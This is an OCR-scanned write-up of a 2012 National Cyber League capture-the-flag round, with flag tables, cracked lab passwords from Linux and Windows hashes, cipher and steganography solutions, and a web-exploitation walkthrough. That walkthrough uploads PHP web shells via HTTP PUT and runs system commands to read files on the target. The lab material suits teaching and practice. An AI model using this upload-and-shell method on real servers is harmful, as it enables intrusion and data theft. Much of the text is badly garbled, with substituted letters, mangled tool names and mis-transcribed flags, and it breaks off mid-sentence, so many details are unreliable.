What is the plaintext password for Kim Jones's account? 127.0.0.1 (Linux Passwords)

300
What is the plaintext password for Brandon Davidson's account? 127.0.0.1 (Linux Passwords)

400
What is the plaintext password for Aaron Brown's account? 127.0.0.1 (Linux Passwords)

500
What is the plaintext password for John Smith's account? 127.0.0.1 (Linux Passwords)

1000
What is the plaintext password for attackers account (jbowers)? 127.0.0.1 (Linux Passwords)

2500
What is the plaintext password for the root account? 127.0.0.1 (Linux Passwords)

2500
What is the plaintext password for John Smith's account? 127.0.0.2 (Window Passwords)

100
What is the plaintext password for James Johnson's account? 127.0.0.2 (Window Passwords)

100
What is the plaintext password for Emily Miller's account? 127.0.0.2 (Window Passwords)

200
What is the plaintext password for Tom Anderson's account? 127.0.0.2 (Window Passwords)

200
What is the plaintext password for Amanda Williams's account? 127.0.0.2 (Window Passwords)

200
What is the plaintext password for Michael Davis's account? 127.0.0.2 (Window Passwords)

200
What is the plaintext password for Daniel Jameson's account? 127.0.0.2 (Window Passwords)

200
What is the plaintext password for Kim Jones's account? 127.0.0.2 (Window Passwords)

300
Foi Public Release

SM
Name Server

Value
What is the plaintext password for Brandon Davidson's account? 127.0.0.2 (Window Passwords)

400
What is the plaintext password for Aaron Brown's account? 127.0.0.2 (Window Passwords)

500
What is the plaintext password for attackers account (nsanders)? 127.0.0.2 (Window Passwords)

2500
What is the plaintext password for the Administrator's account? 127.0.0.2 (Window Passwords)

2500
What is the first Advanced Cryptography flag?
127.0.0.4 (Advanced
Cryptography)
300
What is the second Advanced Cryptography flag?
127.0.0.4 (Advanced
Cryptography)
300
What is the third Advanced Cryptography flag?
127.0.0.4 (Advanced
Cryptography)
300
What is the flag for the first Basic Cryptography puzzle? 127.0.0.3 (Basic Cryptography)

100
What is the passphrase for the key-pair?
127.0.0.4 (Advanced
Cryptography)
5000
Using the previous key-pair, what is the fifth Advanced
Cryptography flag?
127.0.0.4 (Advanced
Cryptography)
5000
What is the flag for the second Basic Cryptography puzzle? 127.0.0.3 (Basic Cryptography)

200
What is the flag for the third Basic Cryptography puzzle? 127.0.0.3 (Basic Cryptography)

200
What is the flag for the fourth Basic Cryptography puzzle? 127.0.0.3 (Basic Cryptography)

200
What is the flag for the fifth Basic Cryptography puzzle? 127.0.0.3 (Basic Cryptography)

500
What is the flag for the sixth Basic Cryptography puzzle? 127.0.0.3 (Basic Cryptography)

600
What is the flag for the seventh Basic Cryptography puzzle? 127.0.0.3 (Basic Cryptography)

600
What is the flag for the eighth Basic Cryptography puzzle? 127.0.0.3 (Basic Cryptography)

700
What is the flag for the ninth Basic Cryptography puzzle? 127.0.0.3 (Basic Cryptography)

900
What is the flag for the tenth Basic Cryptography puzzle? 127.0.0.3 (Basic Cryptography)

2000
What is the flag found in the first Steganography challenge? 127.0.0.5 (Steganography)

200
What is the flag found in the second Steganography challenge? 127.0.0.5 (Steganography)

200
What is the flag found in the third Steganography challenge? 127.0.0.5 (Steganography)

300
What is the flag found in the fourth Steganography challenge? 127.0.0.5 (Steganography)

300
What is the flag found in the fifth Steganography challenge? 127.0.0.5 (Steganography)

500
Foi Public Release

SM
Name Server

Value
What is the flag found in the sixth Steganography challenge? 127.0.0.5 (Steganography)

500
What is the flag found in the seventh Steganography challenge? 127.0.0.5 (Steganography)

5000

C. L|nux asswords

The playei was pioviueu with a complete Linux etcshauow file,
containing the hasheu veisions of all usei passwoius. The contestant
was then askeu to finu a seiies of flags, namely the ciyptogiaphy
hashing algoiithm oi the passwoiu itself.

1. nash|ng A|gor|thms

The fiist five (S) flags ask simply foi the hashing algoiithm
useu foi the paiticulai usei's passwoiu hash. This is easily
obtainable fiom the beginning pait of the hash.

Linux hashes within the M*?BM=1%D/. file stait with a uollai
sign followeu by a numeiical value iepiesenting the hashing
algoiithm. With the single exception of unsalteu BES hashes
which just pioviue the hash.

emiller:3e05v.ztZ8LNE:15652:0:99999:7:::
tanderson:$1$AqW8SRi1$Dd0m3hFyOI276/IHinecr0:15652:0:99999
:7:::
awilliams:mQK2Y4hWq0SvY:15652:0:99999:7:::
mdavis:$5$i3uY6Gfp$ywzsyCNRs7kbKbN7Ad0SnGR7P6bVmMQ8iJ70
08mrGHC:15652:0:99999:7:::
djameson:$6$iimf1wnL$T/0zG89BxF.qKzMyX7BZJCSye5x7wIQxox5d
MMwWPdvpzFMOs2YkknqHdMbbdxyBN7NNNBnAh/d7YY2fRRV3k0:15
652:0:99999:7:::

WhaL hashlng algorlLhm ls ln use for Lmlly Mlller's accounL? uLS
WhaL hashlng algorlLhm ls ln use for 1om Anderson's accounL? md3
WhaL hashlng algorlLhm ls ln use for Amanda Wllllams's accounL? uLS
WhaL hashlng algorlLhm ls ln use for Mlchael uavls's accounL? SPA236
WhaL hashlng algorlLhm ls ln use for uanlel !ameson's accounL? sha312

Foi Public Release

SM
2. Cracked asswords

Simply enough, the iequiiement was to ciack eleven (11)
Linux passwoius, anu submit the ciackeu plaintext passwoiu
as the flag.

0f these eleven (11) passwoius, the fiist five (S) weie
uictionaiy teims. The next two (2) weie uictionaiy teims
beginning with a capital lettei anu appenueu with a numeiical
uigit, a simple peimutation. The following thiee (S) aie a
slightly moie complex peimutation, two uictionaiy teims
sepaiateu by a numeiical uigit. The last two passwoius weie
by fai the most uifficult, using the stanuaiu NCL foimat; these
weie a total of thiiteen chaiacteis long, containeu two
symbols, foui alphabetic chaiacteis anu foui numeiical uigits.

Regaiuless, the entiie passwoiu list was bieakable with simple
tools such as ^/1) -1* \6NN*2.

Some clevei peimutation iules oi custom uictionaiy files
woulu ceitainly make the last two (complex) passwoius much
easiei to ciack. The playei knew the NCL foimat followeu a
pieuictable pattein, the letteis "N", "C", anu "L" followeu by a
single hyphen, then foui ianuom alphabetical chaiacteis,
anothei hyphen, anu then foui ianuom numeiical chaiacteis.
With this infoimation the ielative numbei of chaiacteis
neeuing to be testeu goes uown to eight. Thus limiting the
entiie maximum possible passwoius to only 466,976.

WhaL ls Lhe plalnLexL password for Lmlly Mlller's accounL? lloveyou
WhaL ls Lhe plalnLexL password for 1om Anderson's accounL? assword
WhaL ls Lhe plalnLexL password for Amanda Wllllams's accounL? CwerLy
WhaL ls Lhe plalnLexL password for Mlchael uavls's accounL? bllnk182
WhaL ls Lhe plalnLexL password for uanlel !ameson's accounL? WhaLever
WhaL ls Lhe plalnLexL password for klm !ones's accounL? assword1
WhaL ls Lhe plalnLexL password for 8randon uavldson's accounL? Welcome2
WhaL ls Lhe plalnLexL password for Aaron 8rown's accounL? caL8dog
WhaL ls Lhe plalnLexL password for !ohn SmlLh's accounL? admln4you
WhaL ls Lhe plalnLexL password for aLLackers accounL ([bowers)? nCL-AluP-7398
WhaL ls Lhe plalnLexL password for Lhe rooL accounL? nCL-lCCW-2309

Foi Public Release

SM
- All Rights Reserved Su
D. W|ndows asswords

Foi the Winuows Passwoius the paiticipant was pioviueu with a
uump of all of the Winuows hashes fiom the system. The playei then
simply neeueu to ciack the pioviueu passwoiu hash anu submit the
ciackeu passwoius as the flag.

All of the passwoius weie hasheu using the W>IV>I hash, a weak
hashing system commonly founu on oluei Winuows baseu systems
(though still founu touay foi backwaius compatibility). W>IV>I
actually splits all passwoius into seven-chaiactei sets befoie hashing
them, anu ignoies case sensitivity entiiely. Because of these factois
biute foicing, oi uictionaiy testing, W>IV>I hashes is fast, efficient,
anu effective.

Again, a simple passwoiu-ciacking tool like }ohn The Rippei was
efficient at bieaking the passwoius. Bue to the weak ciyptogiaphy-
hashing algoiithm useu, passwoiu complexity is an almost entiiely
moot subject.

WhaL ls Lhe plalnLexL password for !ohn SmlLh's accounL? password
WhaL ls Lhe plalnLexL password for !ames !ohnson's accounL? LurLles
WhaL ls Lhe plalnLexL password for Lmlly Mlller's accounL? ralnbows
WhaL ls Lhe plalnLexL password for 1om Anderson's accounL? oracle
WhaL ls Lhe plalnLexL password for Amanda Wllllams's accounL? 123436
WhaL ls Lhe plalnLexL password for Mlchael uavls's accounL? greenday
WhaL ls Lhe plalnLexL password for uanlel !ameson's accounL? lforgeL
WhaL ls Lhe plalnLexL password for klm !ones's accounL? 8eady2go
WhaL ls Lhe plalnLexL password for 8randon uavldson's accounL? ass4you
WhaL ls Lhe plalnLexL password for Aaron 8rown's accounL? car2Lruck
WhaL ls Lhe plalnLexL password for aLLackers accounL (nsanders)? nCL-k!Su-8930
WhaL ls Lhe plalnLexL password for Lhe AdmlnlsLraLor's accounL? nCL-PC8?-3891

Foi Public Release

SM
L. 8as|c Cryptography

Foi each Basic Ciyptogiaphy challenge the playei was pioviueu with a
file containing nothing moie than an enciypteu stiing.

1. Cha||enge Cne

The enciypteu stiing:

Q29uZ3JhdHVsYXRpb25zISAgWW91IGhhdmUgc29sdmVkIHRoZSBma
XJzdCBCYXNpYyBDcnlwdG9n
cmFwaHkgY2hhbGxlbmdlLCB0aGUgZmxhZyBpczogIE5DTC1XRkxBLTU
yMzEK

The stiing is simply encoueu using BASE64 encouing.

The ueciypteu stiing:

Congratulations! You have solved the first Basic Cryptography
challenge, the flag is: NCL-WFLA-5231

2. Cha||enge 1wo


Fjrrg, lbh unir fbyirq gur frpbaq Onfvp Pelcgbtencul punyyratr, gur
synt vf: APY-TFQY-8932

The stiing is enciypteu using the R0T-1S ciphei, a Caesai
ciphei shifteu by thiiteen.


Sweet, you have solved the second Basic Cryptography challenge,
the flag is: NCL-GSDL-8932

3. Cha||enge 1hree


Zmlgsvi lmv yrgvh gsv wfhg, blf'ev mld ulfmw gsivv uozth uli gsv
Yzhrx Xibkgltizksb xszoovmtv, gsv uozt rh: MXO-HTLH-7428

Foi Public Release

SM
The stiing is enciypteu using the Atbash ciphei, a substitution
ciphei using a ieveiseu alphabet.


Another one bites the dust, you've now found three flags for the
Basic Cryptography challenge, the flag is: NCL-SGOS-7428

4. Cha||enge Iour


--- -.- .- -.-- --..-- / -. --- .-- / - .... .. ... / --- -. . / .. ... / .--- ..- ...
- / - --- --- / . .- ... -.-- / --..-- / - .... . / ..-. .-.. .- --. / .. ... ---... /
-. -.-. .-.. -....- ..-. .- .... ..- -....- ..... ....- ----- ...&

Enciypteu by taking the stiing, conveiting to Noise coue, anu
conveiting the Noise coue tones to ASCII.


Ckay, now Lhls one ls [usL Loo easy, Lhe flag ls: nCL-lAPu-
3403

S. Cha||enge I|ve


O,iLimt tleeseYrexefsCta lg nl !hliNK-5ky hsFA siprat-i ilb sda h E o
h etsto ai rporpycalne. o' oei: Tefa s C-UN82at G on w u tKftn
BcyghhesDtst g:LM0

The stiing is enciypteu with the Railfence Ciphei, using the
stanuaiu thiee-iails.


Okay, this FLAG is important - it will be used as the KEY for the
next set of Basic Cryptography challenges. Don't lose it:! The
flag is: NCL-KUMN-8025

As the ueciypteu stiing value states, this flag is paiticulaily
impoitant. As most ciyptogiaphy systems iequiie a key, oi a
shaieu seciet, it is impeiative that the playei uncoveis the key.
It is this flag value that will be useu as the key, anu theiefoie be
iequiieu, by most of the following flags.
Foi Public Release

SM
6. Cha||enge S|x


AJNG! Nijsbuq mgna kulqyosuk. Jigy mjtq hjqu sj aj. Sbu mgna
dr ILG-UAWB-3472

This time the stiing is enciypteu with a Caesai ciphei;
howevei, it is a keyeu Caesai ciphei anu theiefoie iequiies the
pievious flag answei as the key.

Key:

NCL-KUMN-8025


GOAL! Another flag decrypted. Only four more to go. The flag
is NCL-EGWH-3472

7. Cha||enge Seven


HtsLahlo n-taaph'S tgeatDw? fr?Ga iud Ks sle - I:lrT8at y?h3
e2bwNt 9iaChWf

Foi this puzzle no key was iequiieu, at least not in the
tiauitional unueistanuing of the teim key. The stiing is
enciypteu with the Scytale Tool, often iefeiieu to as a Skip
tiansposition ciphei.

Although no key is iequiieu a shaieu seciet is neeueu, the
numbei in which to use foi the skip. In this case the numbei is
simply the "flag" numbei: 7.


Hopefully that was a bit harder? What? It wasn't? The flag is:
NCL-SDGK-8329
Foi Public Release

SM
8. Cha||enge L|ght


i atnheI ts -itsTn Z e rso C8 ' uoon,t-ebroh2:e hutimfnnI3HN
Dayga7 Es oe'vFfeghLlh g

This stiing was enciypteu with the 0bichi, a ueiman WWI
uouble columnai tiansposition ciphei.

Key:

NCL-KUMN-8025


I have to be honest, I'm running out of things to say here' The
flag is: NCL-DFHE-2378

9. Cha||enge N|ne


VWNzaywgc2FoIGdqemVhdGcgdnYgaGttIHNidnByIGRpIG5yIHJjZGkgcX
RyYSBhemUgbW1qIGdq
cCBMVUVSNjQgcnBueXh1YXQsIGZ0bmgnZiBsYnfigKYgIEVyeSByeW5pI
HRjOiAgSE9ZLVdBUEwt
ODkzOAo=

This stiing was fiist enciypteu with the vlgenere clpher, a
polyalphabeLlc modlflcaLlon of Lhe Caesar clpher. lL was Lhen
8ASL64 encoded.

Key:

NCL-KUMN-8025


Paha, you LhoughL lL was golng Lo be easy when you saw
Lhe 8ASL64 encodlng, dldn'L you. 1he flag ls: nCL-!?L8-
8938
Foi Public Release

SM
10. Cha||enge 1en


U2FsdGVkX1/7sWQc3YpZjDfZgcKi3zB/yR6A8oBDpfVGpAhwAMd9DU
27TNLqL+G8pJaPn1y88qV5hEVbVQH8XVxOjDppGWha8y0rYB6LLsk
AKDivCGJN5K5tWRVJX6/mq1PgHYHTDKCfvPN8wNvEpDoQvhezxmLA
Q9tjaw2QlPdfl0w9fk2QAYt3d6lzvU9rEmh5QEz1eWPuqqhZi38u+lD3o
X3ZhEBXDNPmjuNxX/8Jx55nnVhVR4sqL1LaoNUybZfJiIpt2kviKx7PF8
9XVMzebygfr2KbNTCGm4TMH/54zZdsudftueoYiUYMJHRMY4L1exZYZ
MJt5P8fGOGL5A==

In this case the ciphei text is an ASCII-Aimoieu AES-2S6-ECB
enciypteu stiing.

Key:

NCL-KUMN-8025


CreaL !ob! ?ou dld lL, you goL Lhe flnal 8aslc CrypLography
challenge flag. 1hls was cerLalnly a loL harder Lhan Lhe
resL. 8uL Lhe polnLs wlll be worLh your efforL. Cood luck
on Lhe resL of Lhe game. 1he flag ls: nCL-k?l8-9033
Foi Public Release

SM
I. Advanced Cryptography

Theie weie foui flags foi the Auvanceu Ciyptogiaphy section. The
focus of the Auvanceu Ciyptogiaphy was specifically asymmetiic
enciyption anu, fuithei, the piactical implementation anu usage of
public key ciyptogiaphy.

1. uzz|es Cne, 1wo, and 1hree

Foi the fiist thiee Auvanceu Ciyptogiaphy puzzles the playei
was pioviueu an aichive containing six (6) files: the public key,
a coiiesponuing piivate key, a text file containing the key's
passphiase, anu thiee enciypteu "flag" files.

The playei only neeueu to impoit the uPu keypaii into theii
keychain, anu ueciypt each flag.

WhaL ls Lhe flrsL Advanced CrypLography flag? nCL-!kC8-8972
WhaL ls Lhe second Advanced CrypLography flag? nCL-xCCl-3487
WhaL ls Lhe Lhlrd Advanced CrypLography flag? nCL-nuSv-6482

2. uzz|es Iour and I|ve

The last two Auvanceu Ciyptogiaphy puzzles iequiie the
paiticipant to biute-foice the passphiase on a uPu key, anu
then utilize the key to ueciypt a flag file. All thiee files,
(enciypteu flag, public key, anu piivate key) aie pioviueu.

Theie aie vaiious tools publically available to biute-foice uPu
keys. The populai }ohn The Rippei tool has a "^4@Z/" veision,
which incluues the ability to bieak PuPuPu Keys.

The paiticipant can naiiow theii seaich iange using a
customizeu uictionaiy oi iuleset uetailing the known NCL flag
foimat. With 466,976 possible passphiase combinations this
biute-foice will be time intensive but it's moie than bieakable.

WhaL ls Lhe passphrase for Lhe key-palr? nCL-lSkM-7382
uslng Lhe prevlously key-palr, whaL ls Lhe flfLh Advanced
CrypLography flag? nCL-!PWk-3387
Foi Public Release

SM
G. Steganography

Theie weie a total of seven (7) Steganogiaphy challenges in the thiiu
NCL iounu.

1. I|rst uzz|e

The fiist Steganogiaphy puzzle is simple, containing the flag in
the image's metauata, easily obtainable fiom the file piopeities
oi even simply passing the image file though the =?26)&= utility.

Flag:

NCL-LBJV-5397

2. Second uzz|e

The seconu Steganogiaphy puzzle is less tiivial. The image
appeais as if it weie completely blank, puiely white. Attempts
to finu the flag within the metauata woulu be fiivolous, as it is
much moie simple than that.

This image actually contains the flag in white text, which is
sitting against a white backgiounu. Inspection of the image
will ieveal that the backgiounu is +55M+55M+55 _\`Sa anu
ceitain poitions (the text) aie +53M+53M+53 _\`Sa.

A quick anu easy methou of ietiieving this flag is to use the
V%&6B W%==/ tool founu in Image Euiting softwaie (like `UVE oi
E1/?/=1/N). The V%&6B W%==/ will select the text, allowing the
playei to altei the coloi of only the text, ievealing the flag.

Flag

NCL-JKTY-8343
Foi Public Release

SM

3. 1h|rd uzz|e

This image contains anothei file, embeuueu using the
S%??$*F?*& algoiithm. 0sing a tool like Bigital Invisible Ink the
contestant coulu easily extiact the embeuueu file, which simply
contains the flag value.

Flag

NCL-OCKM-4576
Foi Public Release

SM
4. Iourth uzz|e

S$6)D<6D* algoiithm. Again using Bigital Invisible Ink the
playei can easily extiact the embeuueu file, which simply

Flag

NCL-KGGS-6551
S. I|fth uzz|e

This image contains anothei file, embeuueu using the <6D*F**C
algoiithm.
Foi Public Release

SM
0nlike the pievious algoiithms, the <6D*F**C iequiies a
passwoiu. In this case the passwoiu "IAW" was useu. Bigital
Invisible Ink can easily extiact the embeuueu file, which simply

Flag

NCL-VHGD-6581

6. S|xth uzz|e

PT)%@6BS%??$*F?*& algoiithm.

BynamicBattleSteg iequiies a passwoiu. In this case the
passwoiu "IAW" was useu. Bigital Invisible Ink can easily
extiact the embeuueu file, which simply contains the flag value.

Flag

NCL-GRBS-4237

Foi Public Release

SM
7. Seventh uzz|e

The seventh anu final Steganogiaphy puzzle, anu the last flag
foi Rounu S of the NCL is, by fai, the most complex.

The playei is pioviueu with an aichive containing 26 files,
nameu with "SC7-" anu then a single chaiactei, "%" thiough "J."

Running the L6$* utility against all of the files will show that the
files aie actually poitions of a split }PEu file. This will also
ieveal that the fiist piece of the image is actually the pait
labeleu "A." Reviewing the file sizes will inuicate that the
poition labeleu "Z" is the last section of the image.

file *
SC7-A: PC bitmap, Windows 3.x format, 1024 x 857 x 24
SC7-B: data
SC7-C: data
SC7-D: data
SC7-E: ERROR: line 22: regexec error 17, (illegal byte sequence)
SC7-F: data
SC7-G: data
SC7-H: data
SC7-I: data
SC7-J: data
SC7-K: data
SC7-L: data
SC7-M: data
SC7-N: data
SC7-O: data
SC7-P: data
SC7-Q: data
SC7-R: data
SC7-S: data
SC7-T: data
SC7-U: data
SC7-V: data
SC7-W: data
SC7-X: data
SC7-Y: data
SC7-Z: data

-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-A
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-B
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-C
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-D
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-E
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-F
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-G
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-H
Foi Public Release

SM
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-I
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-J
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-K
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-L
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-M
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-N
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-O
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-P
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-Q
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-R
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-S
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-T
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-U
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-V
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-W
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-X
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-Y
-rw-r--r-- 1 user group 72758 Sep 29 17:10 SC7-Z

At this point the paiticipant likely believes the files simply
neeueu to be concatenateu in alphabetical oiuei. But this will
iesult in a bioken image.

Foi Public Release

SM
The bioken image uoes begin to illustiate what the enu image
shoulu look like, assisting the contestant with futuie spot-
checks of theii concatenateu oiueiings.

0ne solution to finuing the piopei oiueiing is tiial anu eiioi,
anothei sciipting, enumeiating thiough all of the possible
combinations.

The oiueiing, howevei, is actually logical, anu not ianuom.

Files "A" thiough "N" aie the even numbeieu files.

Files "N" thiough "Z" aie the ouu numbeieu files.

A = Part 0
B = Part 2
C = Part 4
D = Part 6
E = Part 8
F = Part 10
G = Part 12
H = Part 14
I = Part 16
J = Part 18
K = Part 20
L = Part 22
M = Part 24
N = Part 1
O = Part 3
P = Part 5
Q = Part 7
R = Part 9
S = Part 11
T = Part 13
U = Part 15
V = Part 17
W = Part 19
X = Part 21
Y = Part 23
Z = Part 25

Which iesults in the following oiuei:

SC7-A SC7-N SC7-B SC7-O SC7-C SC7-P SC7-D SC7-Q SC7-E SC7-
R SC7-F SC7-S SC7-G SC7-T SC7-H SC7-U SC7-I SC7-V SC7-J SC7-
W SC7-K SC7-X SC7-L SC7-Y SC7-M SC7-Z

Concatenating the files in oiuei pioviues the playei with the
ieconstiucteu image.

Foi Public Release

SM
cat SC7-A SC7-N SC7-B SC7-O SC7-C SC7-P SC7-D SC7-Q SC7-E
SC7-R SC7-F SC7-S SC7-G SC7-T SC7-H SC7-U SC7-I SC7-V SC7-J
SC7-W SC7-K SC7-X SC7-L SC7-Y SC7-M SC7-Z > fixed.jpg

Now that the paiticipant has the image put back togethei,
theie is still the mattei of the embeuueu file. That's iight, this
challenge is not ovei yet.

}ust like all of the pievious Steganogiaphy puzzles this ones
also has a hiuuen flag within.

This pictuie of a puzzle has anothei file embeuueu within using
the PT)%@6BS%??$*F?*& algoiithm. Again using "NCL" as the
passwoiu. The embeuueu file is actually anothei white-text on
white-backgiounu image.

Flag

NCL-KLMG-8245
Foi Public Release

SM
V. NCL Champ|onsh|p

The 2u12 Championship foi the National Cybei League inviteu the top ten
playeis fiom each confeience ovei the couise of the pievious thiee iounus.

This final championship iounu incluueu all of challenges that weie not solveu
uuiing the pievious iounus.

In auuition to the pievious puzzles two new challenges weie intiouuceu
within the Web Exploitation anu Netwoik Bata Analysis sections.

A. I|ags
Name Server

Value
What is the MD5 flag found on Target 1?
54.243.211.149 (Web Exploitation -
Target 1)
2500
What is the MD5 flag found on Target 2?
Target 2)
5000
What is the first flag found on Target 3?
Target 3)
1000
What is the second flag found on Target 3?
Target 3)
1000
What is the third flag found on Target 3?
Target 3)
1000
What is the fourth flag found on Target 3?
Target 3)
1200
What is the fifth flag found on Target 3?
Target 3)
1300
What snort SID fired on traffic at 05/29-14:44:02.433544? 127.0.0.4 (Network Data Analysis)

500
What is the IP address of the attacker? 127.0.0.4 (Network Data Analysis)

500
What service is the victim running? (Vendor Product) 127.0.0.4 (Network Data Analysis)

500
What URI was the attacker attempting to access? 127.0.0.4 (Network Data Analysis)

1000
What CVE is being exploited? 127.0.0.4 (Network Data Analysis)

5000
What is the plaintext password for John Smith's account? 127.0.0.5 (Linux Passwords)

1000
What is the plaintext password for attackers account
(jbowers)?
127.0.0.5 (Linux Passwords)

2500
Foi Public Release

SM
Name Server

Value
What is the plaintext password for the root account? 127.0.0.5 (Linux Passwords)

2500
What is the flag for the fifth Basic Cryptography puzzle? 127.0.0.6 (Basic Cryptography)

300
What is the flag for the eighth Basic Cryptography puzzle? 127.0.0.6 (Basic Cryptography)

700
What is the flag for the ninth Basic Cryptography puzzle? 127.0.0.6 (Basic Cryptography)

900
What is the passphrase for the key-pair? 127.0.0.7 (Advanced Cryptography)

5000
Using the previous key-pair, what is the fifth Advanced
Cryptography flag?
127.0.0.7 (Advanced Cryptography)

5000
What is the flag found in the third Steganography
challenege?
127.0.0.8 (Steganography)

300
What is the flag found in the fourth Steganography
challenege?

300
What is the flag found in the fifth Steganography
challenege?

500
What is the flag found in the sixth Steganography
challenege?

500
What is the flag found in the seventh Steganography
challenege?

5000

8. Network Data Ana|ys|s

}ust like the pievious Netwoik Bata Analysis, the playei simply
neeueu to analyze the tiaffic with a tiaffic analyzei; howevei this time
auuitional analysis anu ieseaich neeueu to be peifoimeu on the
finuings.

WhaL snorL Slu flred on Lrafflc aL 03/29-
14:44:02.433344 2464
WhaL ls Lhe l address of Lhe aLLacker? 172.16.4.117
WhaL servlce ls Lhe vlcLlm runnlng? (vendor
roducL) Apache 1omcaL
WhaL u8l was Lhe aLLacker aLLempLlng Lo access?
/webdav/examples/SendMallSer
vleL
WhaL CvL ls belng explolLed? CvL-2007-3383

Foi Public Release

SM
C. Web Lxp|o|tat|on - 1arget 1hree

This Web Application simply uisplays a uiiectoiy listing.

Navigating to the "L$%&O,!"N1N" file simply uisplays an eiioi message:

Try Again

uoing to the "N4?"N1N" ietuins a 4uS BTTP Eiioi (Nethou Not
Alloweu) anu pioviues a textual eiioi:

Error: Invalid Method

Knowing the funuamentals of BTTP the eiioi message anu file name
shoulu have pioviueu ample hints, but if those faileu most web
vulneiability scanneis (like I6C?/) woulu also uncovei the fact that
the web seivei accepts P0T iequests, allowing an attackei to uploau
files to the web seivei uniestiicteu.

0nuei noimal ciicumstances the attackei coulu manually launch the
P0T iequest utilizing a socket tool like )*?B%?, in this case fuithei
steps must be taken as BTTPS is in use. Theiefoie the paiticipant will
neeu to use anothei tool oi methou to execute the BTTP P0T iequest
against the seivei.
Foi Public Release

SM
0ne such useful tool is the E/=?*2 Fiiefox Auu-0n. Postei allows the
usei to manipulate BTTP iequests as neeueu anu allows common anu
custom BTTP Request Nethous.

The playei is able to cleaily confiim they have the ability to uploau
anu execute PBP coue.

Foi Public Release

SM
At this point the playei neeus to uploau a set of PBP instiuctions that
will allow them to ieau the contents of flag_u1.php.

<?php print "<pre>"; system("cat flag_01.php"); print "</pre>"; ?>

Looking at the souice of the ietuineu page will ieveal the fiist flag.

<? echo "Try Again"; // NCL-JOFW-9345 ?>

Now the contestant neeus to finu foui othei flags, but theie aien't any
hints to inuicate wheie the flags may be. Seaiches of the web
uiiectoiies will show that theie aie no flags theie. A simple L6)D oi
$/B%?* shoulu uo the tiick. The $/B%?* Linux utility is gieat at quickly
finuing files that contain a paiticulai name anu, baseu on the initial
flag's file name, it's a wise iuea to seaich foi the teim "L$%&."

<.php piint "<pie>"; system("locate flag"); piint "<pie>"; .>

Biowsing to oui newly uploaueu sciipt will pioviue a listing of all of
the files with the teim "flag" in theii name:

/flag_04.txt.asc
/flag_04.txt.gpg
/flag_05.tgz.asc
/flag_05.tgz.gpg
/etc/flag_02.txt
/home/ubuntu/flag_03.txt
/usr/lib/perl/5.14.2/auto/POSIX/SigAction/flags.al
/usr/lib/perl/5.14.2/bits/waitflags.ph
/var/www/flag_01.php

The playei now has the location of the iemaining foui flags. The
seconu anu thiiu one can be obtaineu via a simple uisplay of the file
contents.

<?php
print "Flag02:<pre>";
system("cat /etc/flag_02.txt"); print "</pre>";
print "Flag03:<pre>";
system("cat /home/ubuntu/flag_03.txt"); print "</pre>";
?>

Retuining:
Flag02:
NCL-ONGD-0832
Flag03:
NCL-HSFH-8943
Foi Public Release

SM
The fouith anu fifth flags have a familiai extension. ASC being
ASCII aimoieu enciypteu output fiom uPu. In fact it seems theie
is a binaiy veision of the same file enuing in uPu. This will not be
as simple as outputting the file, A quick listing of the ioot level
uiiectoiy contents will suiely ieveal some useful infoimation.

<?php print "<pre>"; system("ls -la"); print "</pre>"; ?>

total 116
drwxr-xr-x 23 root root 4096 Nov 23 18:41 .
drwxr-xr-x 23 root root 4096 Nov 23 18:41 ..
drwxr-xr-x 2 root root 4096 Oct 12 16:46 bin
drwxr-xr-x 3 root root 4096 Oct 12 16:48 boot
drwxr-xr-x 12 root root 3880 Dec 20 06:35 dev
drwxr-xr-x 89 root root 4096 Dec 20 06:35 etc
-rw-r--r-- 1 root root 580 Nov 23 18:40 flag_04.txt.asc
-rw-r--r-- 1 root root 357 Nov 23 18:39 flag_04.txt.gpg
-rw-r--r-- 1 root root 742 Nov 23 18:41 flag_05.tgz.asc
-rw-r--r-- 1 root root 476 Nov 23 18:41 flag_05.tgz.gpg
-rw-r--r-- 1 root root 3501 Nov 23 18:38 gpg.key
drwxr-xr-x 3 root root 4096 Apr 24 2012 home
lrwxrwxrwx 1 root root 33 Apr 24 2012 initrd.img
drwxr-xr-x 18 root root 4096 Oct 12 16:46 lib
drwxr-xr-x 2 root root 4096 Oct 12 16:45 lib64
drwx------ 2 root root 16384 Apr 24 2012 lost+found
drwxr-xr-x 2 root root 4096 Apr 24 2012 media
drwxr-xr-x 3 root root 4096 Oct 17 11:40 mnt
drwxr-xr-x 2 root root 4096 Apr 24 2012 opt
dr-xr-xr-x 81 root root 0 Dec 20 06:33 proc
-rw-r--r-- 1 root root 4941 Nov 23 18:38 pub.key
drwx------ 4 root root 4096 Dec 1 21:46 root
drwxr-xr-x 16 root root 600 Dec 20 15:18 run
drwxr-xr-x 2 root root 4096 Oct 12 16:47 sbin
drwxr-xr-x 2 root root 4096 Mar 5 2012 selinux
drwxr-xr-x 2 root root 4096 Apr 24 2012 srv
drwxr-xr-x 13 root root 0 Dec 20 06:33 sys
drwxrwxrwt 2 root root 4096 Dec 20 15:17 tmp
drwxr-xr-x 10 root root 4096 Apr 24 2012 usr
drwxr-xr-x 13 root root 4096 Dec 1 22:00 var
lrwxrwxrwx 1 root root 29 Apr 24 2012 vmlinuz

The contestant shoulu hopefully notice the two uPu ielateu
